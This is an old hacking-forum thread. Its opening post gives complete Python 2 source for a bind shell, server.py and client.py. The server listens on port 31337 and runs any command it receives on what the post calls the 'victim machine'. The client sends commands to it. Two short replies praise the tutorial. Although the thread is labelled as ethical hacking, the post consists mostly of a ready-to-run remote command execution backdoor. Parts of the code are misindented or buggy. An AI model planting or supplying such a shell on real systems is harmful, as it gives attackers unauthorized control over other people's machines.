1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Bind Shell and Client in Python

Discussion in 'Ethical hacking Tips' started by lionaneesh, Jul 26, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    “Bind Shell” is often used to describe a piece of program or Shell Code which bind's to a specific port on the machine and provides access to other machines (i.e attacker) to connect and execute shell commands on the victim machine.

    In this article we'll be looking at a basic implementation of Bind Shell and Client coded in python.

    The Code



    The Code structure is distributed to a set of files , server.py and client.py .

    Server

    The server.py program simply listens on the specified port (default : 31337) , and Provides “Shell” access to the connected machines.

    Code:
     #!/usr/bin/env python  
     # Server  
     
     import sys  
     import socket  
     import os  
    
     host = '';  
     SIZE = 512;  
    
     try :  
         port = sys.argv[1];  
    
     except :  
         port = 31337;  
     
     try :  
         sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM);  
    
     except socket.error , e :  
    
         print "Error in creating socket : ",e ;  
         sys.exit(1);   
    
     sockfd.setsockopt(socket.SOL_SOCKET , socket.SO_REUSEADDR , 1);  
    
     try :  
         sockfd.bind((host,port));  
    
     except socket.error , e :        
         print "Error in Binding : ",e; 
         sys.exit(1);  
     
     print("\n\n======================================================"); 
     print("-------- Server Listening on Port %d --------------" % port);  
     print("======================================================\n\n"); 
     
     try :  
         while 1 : # listen for connections  
             sockfd.listen(1);  
                 clientsock , clientaddr = sockfd.accept();  
             print("\n\nGot Connection from " + str(clientaddr));  
             while 1 :  
                 try :  
                     cmd = clientsock.recv(SIZE);  
                 except :  
                     break;  
                 pipe = os.popen(cmd);  
                 rawOutput = pipe.readlines();  
     
                 print(cmd);  
               
                 if cmd == 'g2g': # close the connection and move on for others  
                     print("\n-----------Connection Closed----------------");  
                     clientsock.shutdown();  
                     break;  
                            try :  
                     output = "";  
                     # Parse the output from list to string  
                     for data in rawOutput :  
                          output = output+data;  
                       
                     clientsock.send("Command Output :- \n"+output+"\r\n");  
                   
                 except socket.error , e :  
                       
                     print("\n-----------Connection Closed--------");  
                     clientsock.close();  
                     break;  
      except  KeyboardInterrupt :  
     
    
         print("\n\n>>>> Server Terminated <<<<<\n");  
         print("==========================================================="); 
         print("\tThanks for using Simple-CMD");  
         print("\tEmail : lionaneesh@gmail.com");  
         print("============================================================");
     
     
    Client

    The client.py program connects to the server and sends the commands to be executed.

    Code:
     #!/usr/bin/env python  
     # Simple network client  
    
     import socket;  
     import sys;  
     
     port = 31337;    # The port to listen on is hardcoded , if you bare changing this change the same of the server  
     SIZE = 1000;  
     
     try :  
         host = sys.argv[1];  
     except :     # Add localhost as the server if no host provided  
         host = "127.0.0.1";  
     
     try :  
         sockfd = socket.socket(socket.AF_INET , socket.SOCK_STREAM);  
     
     except socket.error , e :  
           
         print "Error while Creating socket : ",e ;      
         sys.exit(1);  
     
     try :  
         sockfd.connect((host,port));  
     
     except socket.gaierror , e :  
    
         print "Error (Address-Related) while Connecting to server : ",e ;  
     
     except socket.error , e :      
    
         print "Error while Connecting to Server : ",e;  
         sys.exit(1);  
     
     # We are connected now , Start the real shit!  
     
     print("============================================================="); 
     print("\tSimple-CMD\tC0d3d by : 1i0n4n33sh");  
     print("============================================================="); 
     print("\t\tEmail : lionaneesh@gmail.com");  
     print("============================================================="); 
     print("\tC0d3 f0r InDi4 , H4(k F0r 1nDi4 , Liv3 f0r 1nDi4");  
     print("============================================================="); 
     try :  
         while 1:  
             cmd = raw_input("\n\n(simple-cmd) $ ");  
             sockfd.send(cmd);  
             result = sockfd.recv(SIZE).strip();  
             if not len(result) :  
                 fd.close();  
                 sockfd.close();  
                 break;  
             print(result);  
     except KeyboardInterrupt : #clean up code  
         sockfd.shutdown(0);  
         print("\n\n-------- Client Terminated ----------\n");  
         print("\n=================================================="); 
         print("\tThanks for using Simple-CMD");  
         print("\tEmail : lionaneesh@gmail.com");  
         print("====================================================\n\n");
     
    That's it for this article stay tuned for more.
     
  2. Scripting

    Scripting John Hoder

    Joined:
    Jun 29, 2010
    Messages:
    421
    Likes Received:
    57
    Trophy Points:
    0
    Occupation:
    School for life
    Location:
    /root
    This is really good, I think I wouldn't do it as good as you man ! It looks pretty similarly to the way I wrote it in C++ a long time ago. Really awesome tutorial ! Keep it goin'
     
  3. nabila1230

    nabila1230 Banned

    Joined:
    Sep 13, 2011
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    0
    its really great and help full, appreciated to share with us, keep it up
     

Share This Page